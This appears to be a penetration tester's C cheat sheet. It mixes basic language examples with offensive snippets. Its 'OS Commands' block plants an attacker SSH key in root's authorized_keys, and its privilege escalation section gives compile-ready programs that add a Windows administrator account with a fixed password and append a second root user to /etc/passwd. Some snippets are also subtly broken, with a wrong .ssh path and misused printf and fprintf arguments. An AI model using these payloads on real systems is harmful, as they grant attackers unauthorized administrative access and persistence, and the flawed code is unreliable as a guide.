C Cheat Sheet

Cheat sheet and tricks for the C programming language.

Examples

Test C code

#include <stdio.h>

const char IP[] = "x.x.x.x";
const int PORT = 80;

int main() {
    printf(IP);

    //code
    return 0;
}

If Statement

int i = 0;
int j = 1;

if (i == 0 && j == 0) {
    printf("if");
} else if (i == 0 && j == 1) {
    printf("else if");
} else {
    printf("else");
}

OS Commands

system("mkdir /root/.ssh");
system("touch /root/.ssh/authorized_keys");
system("echo 'ssh-rsa ...= kali@kali' > /root/ssh/authorized_keys");

Files

Write to file

#include <stdio.h>

int main() {
    FILE *pFile1;
    char message[] = "This is my message";

    pFile1=fopen("/tmp/message", "a");
    fprintf(pFile1, "%s\n", &message);
    fclose(pFile1);
}

Read file

#include <stdio.h>

int main() {
    FILE *pFile1;
    char buff[255];

    pFile1=fopen("/tmp/message", "r");
    fgets(buff, 255, (FILE*)pFile1);
    fclose(pFile1);

    printf("%s", &buff);
}

Compilation

See gcc.

Cross-Compilation

See Mingw-w64.

Exploit – Privilege Escalation

Windows

Add a user. Should be used with insecure file permissions of services. Cross-compile for Windows (check OS architecture).

#include <stdlib.h>
int main () {
    int myprecious;
    myprecious = system ("net user backup B@ckup123 /add");
    myprecious = system ("net localgroup administrators backup /add");
    return 0;
}
i686-w64-mingw32-gcc myprecious.c -o myprecious.exe

Unix

Add a second root user.

#include <stdlib.h>

int main () {
    system("echo myprecious:$(openssl passwd PreciouS):0:0:root:/root:/bin/bash >> /etc/passwd");
}
gcc myprecious.c -o myprecious